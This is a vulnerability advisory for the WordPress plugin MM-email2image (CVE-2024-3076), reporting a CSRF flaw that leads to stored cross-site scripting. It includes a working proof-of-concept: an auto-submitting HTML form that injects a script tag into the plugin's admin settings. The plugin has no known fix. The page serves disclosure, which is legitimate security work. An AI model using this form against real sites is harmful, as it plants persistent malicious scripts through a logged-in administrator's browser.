WordPress Plugin Vulnerabilities

MM-email2image <= 0.2.5 - Stored XSS via CSRF

Description

The plugin does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack

Proof of Concept

Make a logged in admin open a file containing the HTML:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=mm-email2image%2Fmm-email2image.php" method="post">
        <input type="hidden" name="mm_e2i_submit" value="Y" />
        <input type="hidden" name="mm_e2i_type" value="none" />
        <input type="hidden" name="mm_e2i_textcolor" value='"><script>alert(2)</script>' />
        <input type="hidden" name="mm_e2i_bgcolor" value="32" />
        <input type="hidden" name="mm_e2i_bgtrans" value="YES" />
        <input type="hidden" name="mm_e2i_textsize" value="2" />
        <input type="submit" value="Submit" />
    </form>
</body>
```

Affects Plugins

Plugin icon
mm-email2image
No known fix

References

CVE
CVE-2024-3076

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher
Bob Matyas
Submitter
Bob Matyas
Submitter website
https://www.bobmatyas.com
Submitter twitter
bobmatyas
Verified
Yes
WPVDB ID
617ec2e9-9058-4a93-8ad4-7ecb85107141

Timeline

Publicly Published
2024-04-05 (about 1 months ago)
Added
2024-04-05 (about 1 months ago)
Last Updated
2024-04-05 (about 1 months ago)

Other

Published
Title
Published
2023-11-14
Title
CodeBard's Patron Button and Widgets for Patreon < 2.2.0 - Cross-Site Request Forgery
Published
2014-07-26
Title
Brute Force Login Protection <= 1.5.3 - Arbitrary IP Removal/Add via CSRF
Published
2021-10-04
Title
Paypal Donation < 1.3.1 - CSRF to Stored Cross-Site Scripting
Published
2023-01-19
Title
Nice PayPal Button Lite <= 1.3.5 - CSRF
Published
2023-03-21
Title
Update Image Tag Alt Attribute <= 2.4.5 - Cross-Site Request Forgery